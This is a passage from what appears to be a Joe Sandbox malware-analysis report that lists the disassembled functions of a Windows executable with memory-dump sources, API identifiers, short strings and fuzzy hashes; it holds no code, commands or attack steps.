                                                            Function 00007FF7B111A5D8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise_clrfp
                                                            • String ID:
                                                            • API String ID: 15204871-0
                                                            • Opcode ID: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                            • Instruction ID: 214f6e890d4ba46db86751507cc74c5d4e497647bd8cf91e3316236958605937
                                                            • Opcode Fuzzy Hash: 48b97647827edafc3b78799631f3641f64fd5a0bbb932a3008f366d071470ff1
                                                            • Instruction Fuzzy Hash: BEB19D77601B888BE715DF2DE446368BBA0FB91B4CF168821DB5D837A8CB79D462C710
                                                            Function 00007FF7B10F8AF0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                            • Instruction ID: 88abc29d4fb97e2e826211f7b89b02277630e7754eafcce359bbde78350b30fc
                                                            • Opcode Fuzzy Hash: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                            • Instruction Fuzzy Hash: A0F08162A1C68986E760AF68B48A7A6F351AB55728F840236D76D026D8DFBCD0188A10
                                                            Function 00007FF7B11040C4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-227171996
                                                            • Opcode ID: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                            • Instruction ID: 79540d4f60d288bdd6902f8762309cf4b0595f057e032c8937b357b589d6f5c6
                                                            • Opcode Fuzzy Hash: 92ab44aa671049a5d726c4e1cd9e81523bdb76ab1b5bae976e988b650b47c5f7
                                                            • Instruction Fuzzy Hash: 66E1E832E0864A81E764AE1DB09813CA3A0FF66B4CFB45135DB4E57E98DFB9E851C310
                                                            Function 00007FF7B110EA90 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e+000$gfff
                                                            • API String ID: 0-3030954782
                                                            • Opcode ID: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                            • Instruction ID: e4e2d315bb44f54225db17ee3c898a35c92bb22bfbeae456b3304d1ed2ce454a
                                                            • Opcode Fuzzy Hash: 414bc82e88e4b1ba2530bd57a0790f599c7f8d835f00ab403542f9b81ab3ad6c
                                                            • Instruction Fuzzy Hash: B3519D22F096C942E724DE3AB904769FB91F756B98F98C231CB5847AC9CFBDD4408710
                                                            Function 00007FF7B1111518 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                            • String ID:
                                                            • API String ID: 1010374628-0
                                                            • Opcode ID: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                            • Instruction ID: ebd85ea7c23df156746120f8c27b81cc2a0a0437996fe961046d083419bc4f62
                                                            • Opcode Fuzzy Hash: daa1868950d22527141b3bb5e52a58b64e58f1e29eb8866760703242d5ff76be
                                                            • Instruction Fuzzy Hash: 5A02A221E0D64E80FB64BB397404279D695AF23B98FDA4534DF6D463DAEEFCA4118320
                                                            Function 00007FF7B110E5FC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfffffff
                                                            • API String ID: 0-1523873471
                                                            • Opcode ID: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                            • Instruction ID: 87600d39f2e7370ea2783bce85b6c220fadfd56f8966252c261f600c9635f85e
                                                            • Opcode Fuzzy Hash: bb93477e02d4e941dcb5b3cdf68f9d2c091b313a0377ba104bac55ee011317e1
                                                            • Instruction Fuzzy Hash: C4A16862F097C986EB21DB2AB0047A9BB90EB627C8F548032DF8D47799EE7DD501C711
                                                            Function 00007FF7B1108CB0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: TMP
                                                            • API String ID: 3215553584-3125297090
                                                            • Opcode ID: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                            • Instruction ID: ccafddb6ebb38f7e62bf125309c1b33371bcfe6115f3ec492186e8f930b26e5f
                                                            • Opcode Fuzzy Hash: f418ac5b73ce95224f4cdc4c7ad8bddcd0a3b001ad5768b3b557a0f5eb967220
                                                            • Instruction Fuzzy Hash: DF519F04F0C25A41EB64B62A791917ED391EF76B8CFB84135DF1D4779AEEBCE4114220
                                                            Function 00007FF7B11140D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                            • Instruction ID: 12660304d761bc039b70bbaff6ce8d7c2d28524e84c6e8a7e279891bf15262c8
                                                            • Opcode Fuzzy Hash: 9cb1cd12b35fa318c4a8e0929622bdae7cba3dd6c324a68b4e8dcf83c52a71e5
                                                            • Instruction Fuzzy Hash: 7EB09220E07A0AC2EB083B1A7C82214A2A47F69714FD54038C70C41328EE6C20B54721
                                                            Function 00007FF7B1103CC0 Relevance: .3, Instructions: 327COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                            • Instruction ID: 43c047202b1a57e25de51719265f9d7244e62e618eac9d7b68dd9722d2e6c92e
                                                            • Opcode Fuzzy Hash: b1c086197733176920e670542d9d571295f110a1a04111a447b2e9bf7cf9f205
                                                            • Instruction Fuzzy Hash: 38D12C22D1865A89E728EE2DA04827DA760EB26B4CFB44235CF0D136DDCFB9D941C364
                                                            Function 00007FF7B10F90C0 Relevance: .3, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                            • Instruction ID: cca4258929f0f51c799642d5f32213c3a09f050e4559e2d56bb95e31ec336cf4
                                                            • Opcode Fuzzy Hash: e5e7c7d6f5738ce9ae6dae89df256b28c6339b9d8c2370fd2cf9ecf49eca8280
                                                            • Instruction Fuzzy Hash: 12C1A4722241E18BD3C9EB39E46947AB3A1FB99349FC4413AEB8747B89C63CE015D710
                                                            Function 00007FF7B1103330 Relevance: .2, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                            • Instruction ID: f2301d1af779ece587481e192be0f364d68b222e8eeaef883f6bd8561707f8b0
                                                            • Opcode Fuzzy Hash: 7c9ed06f36b3d533f088c72f27e683e59507fd20484e083b1e58df30cf10ceb8
                                                            • Instruction Fuzzy Hash: 18B1C07292874989E7659F2DE04813CBBA0E716B4CFB44135CB4E47399CFBAE641C728
                                                            Function 00007FF7B110F110 Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                            • Instruction ID: 925e8fd89494a9a2d710e65204f4ec7ceaf27f170413857153f939fbcdafc1cb
                                                            • Opcode Fuzzy Hash: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                            • Instruction Fuzzy Hash: 8B810572E0C28A46E774DB1DA44976AA791FBA7798FA04235DB8D07B8DCE7CD0008B10
                                                            Function 00007FF7B1117350 Relevance: .2, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c34368459bdf7368baf31263ac24a190fc159f540f31ab2486b56688e89a89bf
                                                            • Instruction ID: 83391d8f91d8077e0c99a5c13164a667fdbaabc7268e0c157638f2d5446d4cb1
                                                            • Opcode Fuzzy Hash: c34368459bdf7368baf31263ac24a190fc159f540f31ab2486b56688e89a89bf
                                                            • Instruction Fuzzy Hash: D0610A22F1C29646F764B92CB444339EA81AF62368F960235D71D43BC9EEFDE8108730
                                                            Function 00007FF7B1102474 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                            • Instruction ID: f4dd5911d5b0a7c4b4649d9300870dc22db3d83a023ed135cb8b28fa1a9f0beb
                                                            • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                            • Instruction Fuzzy Hash: 4351B532E1865982E7259B2CE058678B3A0EB6AB5CF754131CF4D47798CBBAE843C750
                                                            Function 00007FF7B1102064 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                            • Instruction ID: 5a4ed7d885fe589f661573bab0bb4d2e69e8de7bd8d297ab0f2a02e6ea5b38aa
                                                            • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                            • Instruction Fuzzy Hash: 4151A436E1865986E7269B2CE048238B3A1EB66B5CF744131CF4D0779CCBBAE843C750
                                                            Function 00007FF7B1102884 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                            • Instruction ID: 83c42f4a2918154b224eba0d2f11c3a8c9ebe3f91d6f7126c9c6837708a791e4
                                                            • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                            • Instruction Fuzzy Hash: 7051E936E1866986E7259B2CE048238B3A0EB66B9CF744131DF4D07798DF7AE843C750
                                                            Function 00007FF7B1102270 Relevance: .1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                            • Instruction ID: c3f1868af9017abb58a81746882e8ef82ec6895186d0f1dec648dd4db68c9073
                                                            • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                            • Instruction Fuzzy Hash: EF51B532E1865581E7269B2DE048238B3A0EB6AB5CFB54131CF4C5779CCB7AE842C750
                                                            Function 00007FF7B1101E60 Relevance: .1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                            • Instruction ID: 1fbc186ce9145f6ba9ffe1c88a9db1d4d8e6ad7d8e22e019c178e0373480ebcc
                                                            • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                            • Instruction Fuzzy Hash: 74518D36E18669C2E7259B2DE04822CA3A1EB66B5CFB44135CB4C07798CB7EEC43C750
                                                            Function 00007FF7B1102680 Relevance: .1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
